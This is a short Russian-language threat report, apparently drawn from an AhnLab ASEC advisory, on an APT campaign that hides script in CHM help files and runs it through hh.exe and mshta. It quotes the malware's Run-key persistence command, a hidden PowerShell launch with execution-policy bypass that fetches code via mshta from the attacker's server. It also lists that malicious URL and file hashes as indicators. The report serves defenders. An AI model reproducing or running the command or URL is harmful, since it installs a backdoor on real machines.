Центр экстренного реагирования AhnLab Security Emergency response Center (ASEC) поделился случаем APT-атаки, в которой использовался CHM (Compiled HTML Help File).
CHM - это экран справки, выполненный в формате HTML. Угрозы могут вводить вредоносные коды скриптов в HTML с включением CHM. Вставленный скрипт выполняется через hh.exe, который является приложением ОС по умолчанию. MITRE ATT&CK называет эту технику, когда угрожающий субъект использует подписанную программу или программу, установленную по умолчанию в ОС, для выполнения вредоносного ПО, T1218 (выполнение системного двоичного прокси). MITRE объясняет, что если угрожающие субъекты используют технику T1218 для выполнения своих вредоносных программ, они могут легко избежать обнаружения на основе процессов и сигнатур, поскольку выполняются через подписанный двоичный файл или программу MS по умолчанию.
Вредоносная программа CHM, обнаруженная ASEC, на этот раз загружает вредоносный скрипт с сервера угрожающего субъекта. Затем он запускает сценарий, выполняя PowerShell через mshta.exe.
Сценарий PowerShell регистрирует команду в реестре Run key для выполнения команд, полученных с C&C-сервера угрожающего агента, и поддержания постоянства.
Команда, зарегистрированная в реестре Run key (поддержание постоянства)
1 | c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 361881 2.2.2.2 || mshta hxxp://shacc[.]kr/skin/product/1.html |
Недавно обнаруженная угроза CHM в конечном итоге выполняет бэкдор в виде PowerShell .
Indicators of Compromise
URLs
- http://shacc.kr/skin/product/1.html
MD5
- 32445d05dd1348bce9b6a395b2f8fbd8
- 809528921de39530de59e3793d74af98